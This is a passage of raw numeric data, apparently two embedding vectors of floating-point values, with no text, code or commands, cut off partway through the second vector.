0.018409109,-0.007394911,-0.008200338,-0.0021202592,0.027555775,0.017491255,0.004668287,0.008666198,0.012085816,-0.014264687,0.0065880166,-0.0009345803,0.020764474,-0.015873646,-0.01413481,-0.019943532,-0.0059944466,-0.009553995,-0.0357126,0.021310154,0.011967087,0.01772943,-0.005385574,0.03956429,-0.027343925,-0.019183468,-0.0117145125,0.012808548,0.009329174,0.008330919,-0.009513149,0.004826214,0.01747392,-0.023219796,-0.0043680356,0.019189045,-0.01185806,0.0013147823,-0.0036624337,0.0076240576,0.0044760895,0.011061695,0.012157589,0.01265603,0.011274414,-0.033731382,-0.021913823,0.031554654,-0.021697659,0.014383201,0.0061314492,0.012111444,-0.01294575,0.024731075,-0.02626053,-0.019790834,0.0004264178,-0.011440847,-0.029289039,-0.023659928,0.018441765,0.009172821,-0.0028784436,0.008279586,-0.011984566,-0.014779696,-0.030098423,-0.02279091,0.0065456578,0.02349379,0.020570375,-0.008505913,-0.04489336,0.005030057,0.008959477,0.003393874,0.0044824686,-0.014927902,0.01905555,0.0066630617,0.04114643,0.03753133,0.019141883,-0.00044015094,-0.020511443,-0.017075071,0.008198043,-0.0398997,0.015515237,-0.013924655,0.009181333,0.0010625607,0.01680491,-0.02625876,-0.004913325,-0.028536685,0.0014327712,0.015081419,0.008777714,0.037288077,0.0039400584,0.026555182,-0.0014155835,0.054990284,-0.0028639098,0.022393642,-0.0072014364,-0.00078548753,0.00006554027,-0.010688302,-0.0210586,0.019078383,0.062744826,-0.014540918,-0.01210392,0.004552386,0.004485752,-0.0023050134,0.0068574194,-0.011564753,-0.003831173,0.005847083,0.005047484,-0.020177728,0.00022577842,-0.006274067,-0.029124286,0.019880135,-0.0021714328,0.02307121,0.022843504,-0.013952603,0.0055895066,-0.024103552,-0.010735957,0.033888802,0.00697517,0.022196108,-0.0040276246,0.010861581,0.007103906,0.009021767,0.014376491,-0.021893183,-0.0020485967,-0.0006053236,0.022019185,-0.010541847,0.0034289972,0.015799297,0.014127141,-0.009890012,0.014619556,0.012397822,-0.0061179334,-0.038065728,-0.008153957,-0.010394747,-0.014868763,-0.005323363,-0.0038249902,0.011923114,0.013140156,-0.015544563,-0.00012270102,-0.0062231175,-0.018893221,0.010106281,0.0038833972,0.003251551,0.0010506491,-0.00047865463,-0.0035871377,-0.013227101,-0.020481104,-0.0010218632,-0.007660126,0.0025225228,0.0029357858,-0.0059467675,0.00713674,0.0011240246,-0.018086651,0.0047321017,0.0057592513,-0.011878891,-0.014814731,0.01974263,0.0034718127,-0.008200409,-0.011566722,0.0277426,0.008322659,0.020851832,0.0010728209,0.0029996813,-0.013593801,-0.042915143,-0.0010592481,0.022186404,-0.023762453,0.01453031,-0.014174677,0.0033487438,0.03196603,0.009025274,0.020061884,-0.00027098754,0.011095172,0.013419821,0.047588468,0.020734824,0.03547262,-0.013008644,0.007593678,-0.040475465,0.008638216,-0.030459289,-0.014335072,-0.017171789,0.019888965,-0.026387341,0.002288943,-0.0098899435,0.012289168,-0.026461512,-0.028249588,0.041589025,-0.0047927606,-0.009079891,0.015079548,0.0013720467,0.0039895964,0.011421014,0.01700297,0.008414412,0.050686307,-0.021510579,0.022843955,0.01133223,-0.014705921,0.014375641,-0.010964711,0.031810023,0.001984114,0.0009798459,-0.017907178,0.0052437936,0.007355674,0.017262425,0.0022556195,0.0031286767,-0.002781527,-0.02142092,0.0060023465,-0.00077013695,-0.016921679,0.012350431,-0.022907287,0.017848529,-0.003655062,0.012390361,-0.007812633,-0.00093238446,0.0061192815,-0.0035680886,-0.022420993,0.009054891,-0.03273811,0.016832003,-0.007351127,0.0023855364,0.006359841,0.02240632,0.012976228,0.0034762092,-0.000431561,0.04304753,0.021065684,-0.018621251,0.032644562,-0.000889895,0.003957953,-0.031084357,0.008136658,-0.0089515615,0.003293323,-0.017229283,0.013495827,0.029632593,0.0033277716,-0.00813355,0.011712256,0.026371015,-0.0009019464,-0.020450355,-0.008732664,0.00018726847,-0.020612856,0.011405663,0.0004934031,0.0032745155,0.0045355414,-0.008247338,-0.01295808,-0.014352125,0.01842463,0.0035264122,-0.0019519863,-0.011600733,0.0143927,0.013933133,-0.01469096,0.040477697,-0.008579967,-0.011442077,0.0018718865,0.007063375,0.011211399,-0.0018030914,-0.004526571,0.010988785,0.015762579,0.010636718,-0.000411421,-0.009623336,0.00599393,-0.021870965,0.011062515,0.014416473,0.011597451,-0.027986903,0.020524072,0.0002304922,-0.0014090702,-0.005051617,0.024203895,-0.0046290234,-0.016085288,0.061778013,0.00979726,-0.017253647,0.0045364,0.026640521,0.023023188,-0.01187096,0.030634807,-0.008366561,-0.021635152,-0.01692448,-0.033457648,0.017915672,0.0036621883,-0.009572966,-0.03172142,-0.020030359,-0.012339578,-0.009392529,-0.018411012,0.030832369,0.010454424,0.0023329984,-0.020976497,-0.010268589,-0.048625197,0.004627757,0.018222637,-0.016268577,0.0034685223,0.025046235,-0.0032638381,0.004061852,-0.009932481,-0.010365326,-0.00868436,-0.005428232,0.019978015,0.0052160304,0.009536585,0.020762222,0.0049709403,0.0016514797,-0.022350756,0.02012685,-0.018307988,-0.0016907599,0.0036182578,-0.009596956,-0.01812861,0.0005019734,0.0027818854,0.019944327,0.0017710773,-0.009422189,0.029736906,0.0055109374,-0.019412458,0.007992842,0.00075858616,0.029128483,0.0066557215,-0.0362974,0.006196911,0.025777468,0.003465305,-0.00890143,0.0035428,-0.00287146,-0.008538355,-0.008181605,0.017592994,-0.0068074465,0.006916612,0.0011933371,-0.0037582393,0.01122872,-0.0072525665,-0.0027059584,0.01075146,-0.030117448,0.00062600564,-0.01547799,-0.013415024,0.007057638,-0.0019289494,0.024690572,0.019439392,0.006904374,0.0042530037,0.024156546,-0.014620243,0.004302316,0.0065917363,-0.021829348,0.02114628,0.017129267,-0.021226889,0.01530546,-0.027460635,-0.0089131715,0.0116998665,-0.018274171,0.00055852724,-0.021069014,0.012916026,-0.021408547,0.0019690238,-0.00047506267,-0.010715708,-0.0037751796,-0.02039327,-0.0019946718,0.03586588,-0.0030773687,-0.024549766,-0.0031326995,0.004121699,0.008210883,-0.014007243,0.0017054611,-0.006433492,-0.0040425374,0.0043230224,-0.008826468,-0.0018296432,0.016183313,-0.0035621752,-0.00832413,0.002894284,0.013555285,0.008836476,-0.011741388,0.017739607,-0.0067387857,0.005846865,-0.0060513983,0.00834156,0.018692369,0.030792033,-0.015506353,0.005033386,-0.015032728,0.0101037845,0.012233015,0.024780981,0.0023534885,-0.0002462457,0.00061286293,0.0045217783,0.026416669,0.01842936,0.015739776,0.028126612,0.0118183885,0.026760785,-0.020051554,-0.028239146,0.013429792,0.000920355,-0.000072551054,-0.016667945,0.0127768805,-0.014014999,0.007642332,0.015703194,-0.027721075,-0.0036993856,0.0017758232,-0.003589419,-0.00037451822,-0.007806343,0.0016206718,-0.009119461,-0.017965574,-0.004484222,-0.018162442,0.019572765,0.0031382537,-0.010276308,-0.0003240211,0.01662306,-0.0022487328,-0.027600171,0.00764832,-0.00776575,-0.041013762,-0.014579367,0.0065480457,-0.0069624456,0.01114549,-0.019072669,0.025961516,0.014010852,-0.018300595,-0.005255315,0.028751653,0.00020135297,-0.014858668,-0.0027914466,-0.017953658,0.018165614,-0.002833124,0.015314267,-0.021672847,-0.0059940326,0.007286531,-0.002430759,-0.010190622,-0.011715595,-0.06843487,-0.0034997556,0.011382242,-0.015404225,-0.010786357,0.0057539963,0.025035407,0.0018031141,0.013495918,0.036430325,-0.020162974,0.0058768466,-0.0047169817,0.009905623,-0.0326432,0.002347368,-0.01765087,-0.0053871428,0.008918154,-0.023568437,0.0028869025,-0.012711641,-0.010160184,0.010898723,-0.008919451,0.02043788,-0.001901463,0.017301034,0.034902595,-0.0121243,0.004520468,0.005261697,-0.021195227,0.001761631,-0.024252027,-0.0025503626,-0.011315744,0.008759259,0.005073435,0.0007141364,0.009502688,0.0113013415,0.0028734922,0.010656676,-0.02070466,0.028659618,-0.026007786,0.033492144,-0.023906596,0.01288468,-0.0020063778,0.002111563,-0.009753091,-0.010772294,-0.016684294,-0.0085957,-0.012978385,0.016192596,-0.011289985,0.029947644,-0.023066355,-0.046477444,-0.024114318,0.009364144,-0.025011277,0.013111135,0.012135492,0.0050326125,0.021687439,0.03556837,0.008758196,-0.0016731718,0.0019574123,0.0065293266,0.033278003,0.0032916646,0.029841518,0.019814515,-0.011513916,0.011391476,-0.009704217,-0.03371424,0.006042057,0.018212147,-0.017323146,0.019170415,0.00067451876,0.021910923,0.0012292562,-0.013532361,0.002613943,0.026167016,-0.02037921,0.029093593,0.032032575,0.014264982,0.025988441,-0.018470706,-0.0026532908,0.0016659893,-0.01403357,0.011309856,0.0055081206,-0.00049901946,-0.027959876,0.017182963,0.0138635095,-0.04821034,-0.008867405,-0.0052260077,0.010988945,0.02881701,-0.029080417,-0.012354481,0.019087987,0.002356896,0.004206877,0.0012445765,0.011496647,-0.021133455,0.007327426,0.01838983,0.00024387908,-0.029961925,-0.0043789577,-0.016119828,-0.019395083,0.023537995,-0.008548364,-0.022203889,-0.00033904065,0.0018704858,0.022402208,0.0017581199,-0.00015866569,0.002414553,-0.029908832,0.0028349466,-0.0045884065,-0.0037883213,-0.005606414,-0.004274852,0.013026408,-0.014616825,-0.001850887,0.001130526,-0.017814785,-0.004968546,-0.018002402,0.03608029,0.012167669,-0.009316178,0.011817608,0.013479056,0.0063137286,0.0015055143,-0.0086048795,0.006932404,-0.008275847,0.01597574,0.0077129714,0.018857026,0.004501524,0.0076803598,0.0034610855,-0.02746351,-0.009744608,0.013437788,-0.0044681774,0.009123679,-0.010505186,-0.017396329,0.006350336,-0.049104482,0.0052994825,0.014035391,-0.0013241359,-0.0054480336,0.029279118,0.028726893,-0.017849956,0.014027813,-0.016984971,-0.0025642607,0.017158637,0.014202483,-0.0045923092,-0.0152917905,-0.008196992,0.017318213,0.024043571,0.015158056,0.0065089306,-0.019046204,0.02144761,0.0017382446,-0.0029720454,-0.008939609,0.013599245,-0.0023530505,-0.03370082,0.0116824955,0.0024055513,-0.035913188,0.015728872,0.0015526996,0.000026413865,0.04124429,-0.0029028326,-0.010146729,-0.0017736526,0.006667419,-0.016943693,-0.017777866,-0.0064824917,0.037802093,-0.019885989,-0.010020921,0.009976217,-0.012402979,-0.020956919,0.011435097,0.017051056,0.00016688886,0.0073706764,0.020842237,0.025431167,0.025559744,-0.016410306,-0.01202661,0.011104033,0.028510623,-0.022569751,0.012267612,0.0044495384,-0.0028665145,0.018423622,-0.00902698,0.012796894,0.0034504922,0.021516217,-0.005604721,0.012672334,0.010385225,0.017993864,-0.0050907834,0.0030937423,0.002983867,0.03783552,0.041231766,0.0042974018,-0.020032538,0.0050512445,0.0056740483,0.0062939115,0.0019739198,0.0003597911,0.0032890849,-0.022859039,0.0044294996,-0.031748664,-0.014730497,-0.027636029,-0.0009129131,0.006136645,0.017863473,0.008815491,-0.032725744,-0.012894662,-0.009895381,0.011533767,0.002318752,0.027249802,-0.019503294,-0.012382897,-0.012288309,0.021224597,0.008912338,-0.001972079,0.009295516,-0.015219772,-0.032668743,-0.009218765,0.009031682,-0.006465256,0.013397202,0.007152528,0.02731883,0.008551703,-0.00050845667,-0.024827853,-0.0052547734,-0.0016168364,-0.006729447,0.0043327394,-0.0038230089,0.019312166,-0.007809116,0.0107526565,0.009558501,0.015786445,-0.01727469,-0.018351426,-0.010154392,0.01633948,-0.025546767,-0.0055638785,0.007985178,-0.015146499,0.0025018388,-0.007426162,0.025165025,-0.015315918,0.01962917,-0.002796291,0.008250803,-0.0054442976,-0.012438245,-0.023522869,-0.008344646,0.007824318,-0.016876642,0.0023329407,-0.027040258,-0.005429747,-0.003611871,0.019471023,0.044649534,-0.012469382,-0.02893485,0.013787961,0.028302029,-0.0033854067,0.0020839032,0.009781142,-0.0048755305,0.00944329,0.033578325,-0.015617044,0.012636473,-0.012017358,-0.009421876,0.005419795,-0.009800461,0.0049908548,0.015238897,0.007923439,0.011003646,0.014582191,-0.005193524,-0.007735479,0.017336326,-0.0010087945,-0.0034147084,0.007730447,0.02627592,-0.03189681,-0.019330243,0.0035875032,0.0149494335,0.012346843,0.021761848,-0.016812451,-0.0044166036,-0.010482989,-0.017579067,-0.0060554333,0.013864812,-0.026864143,0.011820977,0.0013620516,0.019300923,-0.011772564,-0.0151938405,-0.022706848,-0.073920526,0.021578722,0.01007127,0.005342732,0.037535183,0.0011776054,0.0013351556,-0.019500187,-0.03284927,0.017796323,-0.009250669,-0.012902583,0.019005906,-0.002704246,0.017276313,-0.009601238,0.0016646623,0.0046438477,0.005464929,-0.032868974,-0.0024338732,0.002531103,-0.017642822,0.011696275,0.016829735,0.009121112,-0.014420363,-0.026119154,0.019385902,-0.0033521024,0.0047668926,0.009486062,-0.017567044,-0.0064019347,-0.016715894,0.021922994,0.0068732724,0.0066752844,0.019415999,-0.024911057,0.012380189,-0.004260675,-0.016334001,0.0012642958,-0.020436086,0.016153133,-0.00050261285,0.013359453,-0.011496177,-0.0067731207,0.015898442,0.000072524876,-0.003923765,0.02498454,-0.0022423726,0.005968679,0.015754646,0.025448464,0.005771032,-0.0013501323,-0.0023739662,0.027955126,0.0033325946,-0.01612359,-0.00010784205,-0.025594613,-0.009576687,-0.00008947995,0.0041208356,0.023006046,0.01653419,-0.023443798,0.01892852,-0.017785497,-0.006390514,0.009779111,0.022345636,-0.029545829,-0.00028526149,0.020853786,0.0058087744,-0.001602347,0.0012816113,0.009387891,-0.0142540345,0.0121006975,-0.003985427,0.0019948783,0.0074246037,0.020136205,-0.0023991656,-0.011675992,0.019281441,-0.01481055,0.016967602,0.0073624817,0.004196099,-0.002506397,-0.0070155445,0.0065160044,0.01126298,0.02124078,0.005231115,-0.019418444,-0.004967305,-0.022419205,0.00091924204,-0.017213413,-0.016539373,0.00013079299,-0.015825113,0.042049155,0.018067153,0.026896724,0.02159981,0.004848884,-0.015627876,0.002312518,-0.030346276,-0.0143166585,-0.01753331,0.012648221,-0.0066476935,0.030304335,0.0047033574,0.0022686117,0.005324573,0.013281095,-0.010253546,0.013743187,0.001686875,0.018370878,0.00079351536,0.020853687,-0.0040974957,-0.003044051,-0.008291639,0.016833657,-0.008406573,-0.012369147,0.0258287,-0.009638481,0.013672065,-0.0038443818,-0.011945513,-0.0009914181,0.00057375565,-0.0022866984,0.021640543,-0.018871006,-0.008526941,0.021964055,-0.019151123,-0.0042499,-0.0070725214,0.0033829657,0.016612114,0.013990147,-0.0013669055,-0.013270918,-0.0010538937,0.028711783,0.013422876,0.007215487,-0.024421472,-0.017562447,0.0030753133,-0.016010597,-0.008562287,0.004948716,-0.031123616,-0.027889557,0.01788514,-0.004832174,-0.011750258,-0.035770435,0.024499321,0.022243071,-0.010720117,0.016558882,-0.042598296,0.012619509,0.004716603,-0.0005991324,0.0014016639,-0.010023754,0.010234012,0.028444704,0.013983741,-0.006063409,0.038736448,-0.012769,-0.019235112,0.010124324,-0.009869223,-0.015243852,-0.012576725,-0.0052374084,0.0023670262,0.018895589,-0.02110018,0.025273297,0.0028537216,0.017347062,0.034739573,-0.007911317,-0.006464392,0.008259035,-0.015055485,0.016005643,-0.020140627,0.0061852103,0.025286674,0.059433304,-0.010110812,-0.0071194996,-0.0040152585,0.019823056,0.011849222,-0.008954296,-0.010815422,-0.006974667,0.007719091,0.014088378,-0.0005594619,0.0012258725,-0.0020091902,-0.0124648,0.014549983,0.013512707,-0.02928366,0.015565521,0.009093559,0.039674997,-0.02549044,-0.0072096004,-0.04066704,0.007150274,-0.035360705,0.022042865,0.015897729,-0.0030774944,0.03713507,0.0052856957,-0.0038698702,0.015214837,0.029626735,0.015240708,-0.0045862137,-0.018854577,-0.012714261,-0.012087827,-0.012819024,0.02913651,0.009351762,0.011234579,-0.016173594,-0.034212906,-0.013533845,-0.00096492213,0.010539653,0.019467779,-0.017801395,-0.008754351,0.0021966097,0.021967538,0.016799917,0.036927648,0.0008225288,0.0059530847,0.0012506972,0.011225771,-0.01969456,0.0073202006,0.007161824,0.0014222234,-0.011018849,0.033032406,-0.011954254,0.021447988,-0.0060745254,-0.018723028,-0.01655163,0.020184575,-0.0013474736,-0.009233876,0.015143638,0.0036514464,0.026502175,-0.012107986,0.006990816,0.0087450715,-0.033934385,0.024369162,0.008909351,0.008690569,0.022509143,0.009579937,0.003710533,-0.042611614,0.019922864,0.003575966,0.005378182,-0.012466563,-0.0025075097,0.0010137917,0.02438529,-0.0036655748,-0.009418115,0.01766634,-0.010015921,-0.016948596,0.019324686,-0.0054407497,-0.03697438,-0.005857437,0.008940999,0.015507114,-0.01588033,0.01982489,0.02303292,0.010549828,-0.0030565923,-0.008670519,-0.012730657,-0.0027898105,-0.0065274043,0.010143928,0.028993051,-0.015541293,-0.007384683,0.021478336,-0.0044485484,-0.0046452614,0.009427907,-0.00033859786,0.048066705,-0.016891815,0.026179545,-0.034789488,-0.003657285,-0.0104931295,0.014621588,0.001335515,-0.014842729,-0.0023552848,0.024488125,-0.0011141623,0.02180966,0.016707473,-0.0000060278057,0.014330951,0.00533148,0.040781476,-0.014809268,0.0048952126,0.010824336,0.007661508,-0.021518413,0.013635867,0.028256662,0.00033809396,0.012089592,0.0048530945,0.017907282,-0.013067806,-0.027773235,-0.026066232,-0.018451322,0.0044694734,0.010697028,0.0019568682,0.00018584133,0.0055738506,0.008155683,0.022739673,-0.024482531,0.012432077,0.029956708,0.02131489,0.01715892,0.021887198,0.01427378,-0.0033141451,-0.0028685175,0.011855994,0.01430586,0.008420339,0.006628335,0.0012494207,0.01188527,0.025103271,0.003754862,0.0066975304,0.0066148154,-0.020500451,-0.01049199,0.008637723,-0.004470082,0.0011494393,-0.0053454693,-0.026094368,0.0070840297,-0.0033501768,-0.0007459279,-0.007646721,0.02734347,0.0069276416,-0.0080763055,0.020375077,0.009483871,-0.015144027,-0.025995923,-0.015393206,0.011384549,-0.0030026948,-0.0182081,0.017390788,-0.0070416033,-0.026275579,0.00523558,0.0057649864,-0.008927795,0.03285634,0.0073555214,0.006993385,-0.027279396,0.007315593,-0.012001208,-0.023625776,-0.018365592,-0.0151520185,-0.034846332,0.017096601,0.0024773264,-0.0046565174,0.016657205,-0.015890233,-0.012697927,-0.04520671,0.0062200287,0.013977424,-0.032308336,-0.017233398,0.00022961393,-0.0030439533,-0.0017474307,0.0019262071,-0.017732104,0.0068554115,0.0010715467,-0.002370463,0.017347824,-0.010814852,0.00043637792,-0.00421213,-0.0053834645,0.015973382,0.0081226155,-0.011305046,-0.013384109,0.006362331,0.018153112,-0.023398135,-0.004411376,-0.0076978467,-0.027368275,-0.039584104,-0.012044269,0.009349663,0.015591873,0.02282538,0.0019125585,0.013153511,0.019019624,-0.00079081213,0.017525144,0.0028955308,0.027849616,0.014854853,-0.0037955174,-0.030727658,-0.005357828,-0.030237103,0.03013609,-0.003098654,0.012841661,-0.009299406,0.0043237503,0.006284188,0.019071661,-0.0194839,0.0020158796,-0.0047911364,-0.02236311,0.00011057763,-0.0075039687,-0.0058291275,-0.037155114,0.009031146,0.010193841,0.028928855,-0.028822599,0.005108033,-0.0013457934,-0.00620215,-0.015519908,0.0096815685,0.019674595,-0.024379214,-0.016858026,0.028155785,-0.01047089,-0.020807868,-0.0071606957,-0.02100349,-0.000042628642,-0.02364971,0.020271948,0.02500996,-0.00435417,-0.0147319455,0.012879186,-0.011517605,-0.0016315232,-0.03226198,0.010699888,-0.032990903,-0.0024930623,0.014574723,0.005754965,-0.0045833495,0.0015493104,0.04399248,-0.017017817,-0.012435702,0.038797237,0.005704642,0.018347558,-0.011265489,-0.016555628,-0.020340916,-0.010042339,-0.014552514,-0.009095967,-0.011710128,-0.026721703,-0.011451507,0.0068730414,-0.0013789715,0.09481103,-0.016621565,0.0032979944,0.0006851819,0.010493146,-0.02510556,0.031597603,0.022805536,0.012656633,0.002796614,0.00644896,-0.010030367,-0.0023460404,0.0026470777,-0.003976227,0.023618072,0.015471634,0.15318368,-0.0036764361,0.022108449,0.016857471,0.006552748,0.002837116,-0.00053016393,-0.00093934557,-0.05632726,-0.0032535961,-0.0349159,0.012736516,-0.0007919419,-0.013125921,0.009670876,-0.012257876,-0.0030064068,-0.038472623,0.0059475238,0.011021633,-0.012543322,-0.0126829455,0.012511779,0.021741128,-0.00963624,-0.018042566,0.01732143,-0.023661964,0.0055116834,-0.031484228,-0.0032843188,0.018182043,0.05281298,-0.01848133,-0.016201176,-0.0010286535,0.040314544,0.034305837,0.0031501013,0.01651201,-0.010434424,-0.043051768,0.019041182,-0.03108932,0.015976759,0.000951751,0.027956484,0.004631288,0.0018207382,-0.02064114,0.0126192905,0.002902553,0.01569209,-0.012914898,-0.0067718723,-0.016242333,-0.0030819285,0.02657131,0.009289791,-0.013178531,0.00022191869,0.02199607,0.012156912,0.012976128,0.008436688,-0.017478218,-0.0063797906,0.009525847,0.00014661132,-0.013859991,0.0009190261,-0.0005342961,0.015788773,-0.0067983777,-0.013307643,-0.0045202356,0.03195622,0.019530445,0.0220659,0.0018479904,-0.0075385286,-0.00003501163,-0.011457817,0.01598141,0.018494075,-0.008953715,-0.027191143,-0.0076825996,0.01584712,-0.021234738,-0.02078354,-0.009657385,0.013474987,0.009079896,0.000054509313,-0.03143979,0.019013837,-0.012715021,0.0058830036,0.01760133,-0.010449871,-0.03760712,0.006024961,-0.0029362799,-0.014153378,0.0015983112,0.019748937,-0.02352878,0.001152562,0.019839609,0.0036956125,-0.0030722318,0.015034876,-0.01651835,0.015213429,0.004740596,0.047888972,-0.01602831,-0.0152508095,-0.014924779,-0.051255707,-0.020964896,-0.002611192,0.012379201,-0.0029928123,0.006603035,-0.0088901175,-0.015245872,-0.006557544,0.009613971,0.001500361],[0.0011376396,0.02853312,-0.023483861,-0.010054438,0.014723776,-0.01469525,0.007540092,0.02321367,0.011096262,-0.006633138,-0.0027948767,0.016698131,0.009962359,-0.0007794957,-0.02512647,-0.0001550727,-0.0036144888,0.0051970836,0.012870919,-0.01851468,-0.009906985,-0.0060483105,0.017782275,-0.003193158,-0.001829447,0.007967093,0.0022312533,-0.0039374647,-0.0013133569,0.01389388,0.00014848352,0.010386044,0.00037446406,0.012419478,0.022711415,0.0052381945,-0.036514815,-0.010931072,0.01349471,-0.006245547,-0.00881116,0.019436821,-0.004577586,0.043244153,0.0034305942,-0.000357378,-0.026887182,0.008153186,-0.024382828,0.01198945,0.0054447986,-0.009221357,-0.049245253,0.02137045,-0.0149124935,-0.0004918482,-0.0033852095,-0.035143863,0.0060995105,-0.01801327,-0.013371997,0.017268144,0.0233772,-0.034693178,0.03896059,-0.004502732,0.0073668645,-0.008720624,-0.02134155,-0.023766544,0.009755301,-0.000018724037,0.0075488957,-0.00019948112,0.024065038,-0.011557768,0.008278899,-0.0059957453,-0.01697323,0.003626474,-0.019921267,-0.011535249,0.008553952,-0.02002849,0.018218275,0.0011740775,-0.003931265,0.02025017,0.013369743,-0.0049863267,-0.01581988,0.002886097,0.019897923,0.0027055144,-0.011776704,0.03239022,0.004745891,-0.012819226,-0.0045028697,-0.0031638062,-0.006951439,-0.014696001,-0.03134171,0.003916441,0.005238367,-0.013739822,0.03123597,-0.011400138,0.009553317,-0.0053753494,0.006016013,0.014696571,0.008287294,0.0068267533,-0.0036777826,0.0038317125,-0.0072961315,0.007433059,0.011917616,-0.012499078,0.021208769,0.032144494,0.03380524,-0.0018094551,-0.014623924,-0.014159407,-0.01426676,0.019354505,-0.0010494586,0.0042155706,0.010803294,-0.00885694,-0.008053897,0.0035685957,-0.0073092636,-0.005054076,-0.009023914,0.0010039136,0.02038426,-0.010786708,0.0009798699,-0.014978638,-0.0048429337,0.019478947,0.006517732,0.02236455,-0.0010253174,0.00839387,0.02106238,-0.00173152,0.017996902,0.0027729005,0.004164081,-0.0028602805,-0.005440981,0.03053764,-0.0052730883,-0.008442147,-0.018158697,0.00015503095,0.0058001606,-0.0049826144,0.013146541,0.00022968867,0.008148309,-0.016781554,0.021082608,-0.0018056667,-0.030754795,-0.0022075388,0.012797408,0.019435087,0.014364077,-0.016416311,-0.0073144604,0.029242013,-0.008124607,-0.009807285,0.0045585805,-0.022882743,0.023273103,0.037286784,-0.016754013,-0.01349389,0.0019529102,0.022676693,0.019217728,0.010014395,-0.013655989,-0.01579211,0.008752456,-0.006059055,0.014360949,0.010027301,-0.01155334,-0.021948252,-0.0020460095,0.10312882,-0.024513636,0.017156273,-0.0061964793,-0.0045461804,0.026163304,-0.035900496,0.031220153,-0.0022245531,-0.0026484283,-0.016634936,0.021635741,-0.0033021949,-0.0063773533,-0.01005554,-0.012605187,0.006646358,0.0052143564,-0.042620216,0.006068294,0.008706791,-0.0054226466,-0.007868258,0.011980686,0.002269187,0.012899458,-0.040827505,0.013145791,-0.017410368,-0.01429589,-0.0021666493,-0.008086347,-0.03014654,0.02006238,0.0076575894,-0.008018606,-0.0068391496,0.012453964,-0.031186618,-0.007738553,-0.018940223,-0.004754535,0.005938202,0.006760518,0.013265611,0.013625844,0.035108034,-0.01566126,0.0062658866,0.00346978,-0.011148082,-0.0027999037,0.013063867,0.007195683,-0.013190745,0.011090575,0.029626586,-0.0028538501,-0.0312901,0.025902621,0.0010410339,-0.0033906235,0.008024373,0.020923125,0.03124083,-0.010339426,0.02636702,0.048269656,0.0015600249,0.0033780104,-0.01994173,-0.009411551,-0.011819427,-0.01677936,0.0069164317,0.0016869375,0.011655098,0.0065909717,-0.005234826,0.0135419015,-0.0018693355,-0.0019454934,-0.012661514,-0.007940307,-0.018368877,0.019448156,-0.01823923,-0.0012032525,0.024354855,-0.009795004,0.008141109,0.027677983,-0.0080575915,-0.008142251,-0.010307936,0.029672585,0.00607477,-0.027215712,0.004052282,0.0031144752,-0.010470514,0.009070612,-0.008379639,0.012127532,0.0042851167,0.010129004,-0.01790729,-0.024278475,0.0022132425,-0.013613536,0.037555028,-0.038569756,0.02724613,-0.039818916,-0.0019828405,-0.003880519,0.0036187472,-0.00036900296,-0.0022152832,-0.0025910146,-0.002510196,-0.016172115,0.0011460722,0.0038846896,-0.013916136,-0.0025971094,-0.012483114,-0.015106221,0.0002539715,0.0021576122,-0.010776758,0.009360324,0.0036493295,-0.027670732,0.00121549,0.017354464,0.01870346,-0.010905135,0.018766183,-0.013855994,0.013947651,0.010202812,-0.0072427555,-0.01621877,-0.018906558,-0.014361284,-0.00079752563,-0.004009446,-0.01034419,0.0062188944,0.0046167574,0.018301392,0.0059021018,0.023714453,-0.022877585,0.006486794,-0.0077288174,-0.00993325,0.009106638,-0.0005033941,-0.014333435,0.011257963,0.0027605733,0.02073121,0.0027914066,-0.023061883,0.011607052,0.08533119,-0.0012886308,0.0040594894,0.028809316,-0.0011862932,0.0044579473,0.0311805,0.007442603,0.0013900296,-0.010053126,0.0024887458,0.0204177,0.007601475,0.01957094,-0.022591628,0.025787305,-0.021733042,-0.011754177,-0.037563812,-0.022545991,0.031385932,-0.025516268,-0.0039487765,0.0027776593,0.01494856,0.011304706,0.0083696535,-0.00729612,0.011706505,-0.028834792,-0.0057182726,0.0021281573,0.0075850314,0.007488339,-0.034960665,0.031230155,0.007348117,0.0030525879,-0.023878561,-0.016038718,0.005050508,0.010122891,-0.009411929,-0.03248882,-0.012320063,0.048026368,0.0063859737,-0.017863676,-0.025586933,0.013221929,0.009644915,-0.0017616518,-0.008541327,0.0080082575,-0.016397325,0.01628256,0.009918157,-0.041595172,0.035678286,0.0242445,0.011454408,0.009007955,-0.0082327295,-0.017676074,0.008842665,0.03975293,-0.0043842946,0.0017571687,0.0041013854,0.0045885122,0.014324634,0.0031102647,-0.0037558842,-0.0077572553,-0.0047141444,0.030239157,0.007141361,0.008682547,0.027153745,0.026641808,-0.01791668,0.0037592999,0.011862635,0.013269143,0.0037278405,-0.010141158,0.0043403306,0.00027196077,0.01249081,-0.011299316,-0.020241233,0.002435411,0.013391303,0.015410463,-0.00386421,0.009698912,0.00853269,0.0136759905,-0.011787633,0.03329178,-0.015632985,0.0023260748,0.0012390893,-0.034096126,-0.0027107927,0.01545738,0.009236105,-0.0007282429,0.0024650388,0.032318775,-0.021507854,0.011981945,-0.004041995,-0.013266124,0.0006811206,-0.027113153,0.0038984278,-0.031155456,0.0051010344,-0.004191551,0.021248518,-0.008973175,-0.005101894,-0.004413665,-0.010049429,-0.018160244,0.0036824737,-0.024110734,0.017145682,0.01279939,0.0062649627,0.0159251,0.021912402,-0.051936626,0.02740514,-0.0009406276,-0.015570529,-0.01409728,0.033044875,0.010879481,-0.01107617,0.017718822,0.010782972,0.012734222,0.00058289577,0.013476965,0.026352752,-0.00968152,-0.009318456,-0.01065992,-0.031761006,-0.020271435,0.009175264,0.00037585673,-0.005383218,-0.0012254552,0.022631148,-0.019671997,-0.004115864,0.0054035666,0.028134007,-0.0181721,-0.00283301,-0.0013940869,-0.021334814,0.012932779,-0.011012647,0.064560175,-0.012266499,-0.005711944,-0.016661895,-0.0054411395,-0.005639441,-0.0050861486,0.0049320753,0.0026149,0.008563454,-0.009287175,0.010532303,0.000795373,0.030662203,-0.011231981,0.0071046604,0.008697853,0.0059152544,0.0014668562,0.011358917,-0.010714247,0.003605656,-0.0019823082,-0.024168763,-0.025979664,0.033761516,-0.004525126,-0.0136586735,-0.015508543,-0.023084432,-0.009283975,-0.017753903,0.028113253,-0.0022929164,0.01750252,-0.0027217076,0.010684675,-0.0071306657,-0.0045542084,0.03678397,-0.0011943403,0.021563819,0.0105254445,0.0013521706,0.013346606,-0.0058471514,0.006501921,0.0109809935,0.028605113,0.006529491,0.005898788,0.03906239,0.022304317,0.01265409,-0.023957089,0.0015524997,0.0074404487,0.005142284,-0.0058130543,-0.00213505,0.005679367,-0.013068852,-0.0102750175,-0.032141626,-0.033301514,-0.012527604,0.0052490295,-0.0026135873,0.0025188408,-0.04528777,-